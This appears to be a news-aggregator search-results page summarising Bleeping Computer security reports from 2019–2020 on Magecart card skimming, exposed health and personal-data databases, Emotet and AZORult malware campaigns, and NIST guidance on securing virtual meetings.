Search Results for “Sergiu Gatlan”

May 16, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Hackers Infected Forbes’ Website With Credit Card Data-Stealing Magecart Malware

Hackers injected the Forbes’ subscription website with the credit card data stealing script Magecart Bad Packets Report’s co-founder Troy Mursch discovered. The script siphons to the hackers’ server card numbers, expiration dates, and credit card CVV/CVC verification codes, as well as customers’ names, addresses, phone numbers, and emails. While the script can still be found on the website, the domain used by the attackers to collect the stolen payment information has been taken down using Freenom’s abuse API which makes it possible to take down malicious domains immediately.

May 13, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Misconfigured Elasticsearch Database Exposed Sensitive Records on Around 4 Million Panamanian Health Care Patients Reflecting Virtually All of the Country’s Citizens

A huge cache of data on a misconfigured Elasticsearch cluster exposed 3,427,396 records containing sensitive personal information on Panama citizens with “patient” labels, together with another 468,086 records labeled as “test patients, was discovered by security researcher Bob Diachenko. The roughly 3.5 million records Diachenko found contained a wide variety of information, ranging from the “patients” full names, dates of birth, national ID numbers, and addresses to their medical insurance numbers, e-mails, and phone numbers. Assuming there are not a substantial number of duplicates in the database, the 3.9 million records could represent nearly 97% of Panama’s 4.1 million population. Diachenko notified CERT Panama of the exposure and within 48 hours the database had been secured.

May 9, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Unprotected MongoDB Discovered Containing Wealth of Personally Identifiable Information in 275 Million Records on Indian Citizens

An unprotected and publicly indexed MongoDB database hosted on Amazon AWS which contained 275,265,298 records with personally identifiable information (PII) on Indian citizens was discovered by security researcher Bob Diachenko on May 1. The database, which was first indexed on April 23, 2019, revealed a wealth of information including name, email, gender, education level and area of specialization, professional skills / functional area, mobile phone number, employment history and current employer, date of birth and current salary. The owner of the database is unknown and Diachenko notified the Indian CERT team on the incident. The database remained open and searchable until May 8th, when it got dropped by hackers known as ‘Unistellar’ group.

May 4, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
‘Mirrorthief’ Group Launched Credit-Card Skimming Magecart Attacks Against 201 U.S. and Canadian Online Campus Stores

Check out pages of at least 201 U.S. and Canadian online campus stores powered by the PrismWeb e-commerce platform were injected with a JavaScript-based payment card skimming script as part of ongoing Magecart attacks, according to researchers at Trend Micro. The attacks began April 14 when the sites were injected with the malicious Magecart skimming script that can scrape credit card information, as well as personal details entered on the payment page. PrismRBS, which operates the college book store-specific PrismWeb platform, said that once they learned of the attack on April 26, they took steps to immediately halt it, inform bookstore customers and begin work with law enforcement to investigate the matter. Trend Micro cannot associate the attackers with any previous Magecart groups so they’re labeling the campus store attackers “Mirrorthief” after the trojan used in the attacks, Trojan.JS.MIRRORTHEIF.AA.

May 2, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Around 29% of Organizations Had Their Office 365 Accounts Compromised by Hackers in March, Barracuda Networks

Around 29 percent of organizations had their Office 365 accounts compromised by hackers in March 2019 according to a recent analysis of account-takeover attacks targeted at security firm Barracuda Networks’ customers. More than 1.5 million malicious and spam emails were sent from the hacked Office 365 accounts in that month. Of the accounts successfully hacked, the scammers added malicious mailbox rules to hide their activity and deleted the malvertising, phishing, and spam emails sent from the account in 34 percent of the nearly 4,000 compromised accounts. The attackers used a combination of “brand impersonation, social engineering, and phishing,” to impersonate high-profile companies such as Microsoft to persuade victims to visit phishing landing pages.

April 24, 2019
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Actors Behind DNSpionage Add ‘Karkoff’ Malware for Remote Code Execution, Also Improve Target Selection, May Be Tied to OilRig Group

Researchers at Cisco Talos have discovered new evidence that the threat actors behind the DNSpionage campaign have added a new reconnaissance phase that selectively chooses which targets to infect with malware and are using new malware dubbed Karkoff that allows them to execute code remotely on compromised hosts. In the DNSpionage campaign, the threat actors created a new remote administrative tool that supports HTTP and DNS communication with the attackers’ command and control. The researchers also discovered a weak link between the Iranian cyberespionage group OilRig, also known as APT23, and the DNSpionage actors

March 18, 2020
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
NIST Releases Recommendations to Prevent Eavesdropping, Protect Privacy During Virtual Meetings Necessitated by COVID-19

The US National Institute of Standards and Technology (NIST) recommended several measures that should be taken by remote workers to prevent eavesdropping and protect their privacy during virtual meetings while working from home during the current COVID-19 pandemic. NIST warns that”if virtual meetings are not set up correctly, former coworkers, disgruntled employees, or hackers might be able to eavesdrop.” Among the measures recommended are using conferencing software’s built-in security features, employing multi-factor authentication for meetings, limit the reuse of meeting access codes, and enabling notifications on attendees joining in to be able to quickly identify those who shouldn’t be attending and a host of other considerations. NIST’s recommendations follow the release of advice from DHS’s Cybersecurity and Infrastructure Security Agency (CISA) on how to secure VPNs.

Related: Infosecurity Magazine, New York Times, Tech Insider, Gadgets Now, CSO Online, Lowyat.NET, The Sun, Trusted Reviews, ZDNet Security, Techradar, TechUK, SANS, BitSight Security Ratings Blog, iPhone Hacks, Business Insider, Carbon Black, Professional Security Magazine, NIST

Infosecurity Magazine : Working from Home Policies and the Future of Cybersecurity – Infosecurity Magazine
New York Times : Ahead of the Pack, How Microsoft Told Workers to Stay Home
Tech Insider: The Big 3 Detroit automakers and the UAW are joining forces to ensure worker safety as coronavirus threatens plant shutdowns (GM, F, FCAU)
Gadgets Now: Hackers eye workers from home in absence of secure networks
Gadgets NDTV : Coronavirus: Hackers Eye Workers From Home in Absence of Secure Networks
CSO Online: 8 key security considerations for protecting remote workers
Lowyat.NET: Working From Home? Here Are 6 Free Collaborative Tools To Help You Out
The Sun: Best apps for working from home and coronavirus self-isolation – Skype, Slack, Zoom, Hangouts, Discord, Trello and more
Trusted Reviews: Top tech hacks when working from home
ZDNet Security: Work from home on the cheap: Build a budget home office for under $300
Techradar: 5 things to consider when building your home office
TechUK : Strengthening cyber security when working from home
SANS : This is BIG – Please Help Secure Orgs Around the World (Literally) Due to COVID-19
BitSight Security Ratings Blog: Novel Coronavirus Brings New Challenges For Security Teams
iPhone Hacks: Apple Employees Struggling to Work from Home Due to the Company’s Tight Secrecy Rules
Business Insider: Apple’s culture of secrecy is making it hard for employees to work remotely during the coronavirus outbreak, report says
Carbon Black: Tips for Securing Remote Workers
Professional Security Magazine: Coronavirus and work from home
NIST: Preventing Eavesdropping and Protecting Privacy on Virtual Meetings

February 11, 2020
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Emotet Now Features Wi-Fi Worm That Spreads to New Machines Connected to Nearby Insecure Wireless Networks

Researchers at Binary Defense recently discovered an Emotet Trojan sample that features a Wi-Fi worm module that allows the malware to spread to new victims connected to nearby insecure wireless networks. The new strain starts the spreading process by using wlanAPI.dll calls to discover wireless networks around an already infected Wi-Fi-enabled computer and attempting to brute-force its way in if they are password protected. After connecting the compromised device to another wireless network and looking for other Windows devices with non-hidden shares, the malware tries to brute the password for the Administrator accounts on those devices and all the other users it can retrieve. After successfully break into the accounts, the malware then drops the worm. Emotet is considered one of the most threatening malware strains. The Cybersecurity and Infrastructure Security Agency (CISA) recently issued an alert about Emotet advising firms to be on the lookout for it.

February 19, 2020
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Fake ProtonVPN Website Spread AZORult Cryptocurrency-Stealing, Information-Grabbing Malware via Fake Installers

A fake ProtonVPN website delivered the AZORult information-stealing malware to potential victims in the form of counterfeit ProtonVPN installers starting in November 2019, according to researchers at Kaspersky Lab. ProtonVPN is a security-focused open-source virtual private network (VPN) service provider developed and operated by Proton Technologies AG, the same Swiss company that developed ProtonMail. The AZORult trojan sells for around $100 on Russian underground forums and is also known to act as a downloader for other malware families when used in multi-stage campaigns. It is designed to collect and deliver as much sensitive information as possible to its operators, from files, passwords, cookies, and browser history to cryptocurrency wallets and banking credentials once it infects a targeted machine. protonvpn[.]store, the website used to deliver the malicious fake ProtonVPN installers, was registered via a Russian registrar in November 2019. In this campaign, AZORult Trojan steals cryptocurrency from locally available wallets (Electrum, Bitcoin, Etherium, etc.), FTP logins and passwords from FileZilla, email credentials, information from locally installed browsers (including cookies), credentials for WinSCP, Pidgin messenger and others, Kaspersky says.

March 5, 2020
Sergiu Gatlan / Bleeping Computer

Sergiu Gatlan / Bleeping Computer  
Criminals Spread Malware Using Fake Security Certificate Warnings Displayed on Previously Compromised Sites

Cybercriminals are distributing malware using fake security certificate update requests displayed on previously compromised websites to infect potential victims with backdoors and Trojans using a malicious installer, researchers at Kaspersky Lab have discovered. The attackers put up a”NET::ERR_CERT_OUT_OF_DATE” error message presented within an iframe displayed over the site’s actual contents and asking them to install a security certificate that to allow their connection to succeed. The researchers found the earliest signs of this campaign to be dating from January 16, 2020, infecting a range of different kinds of sites. The victims become infected with the Buerak Trojan downloader that will download and install more malware onto infected computers.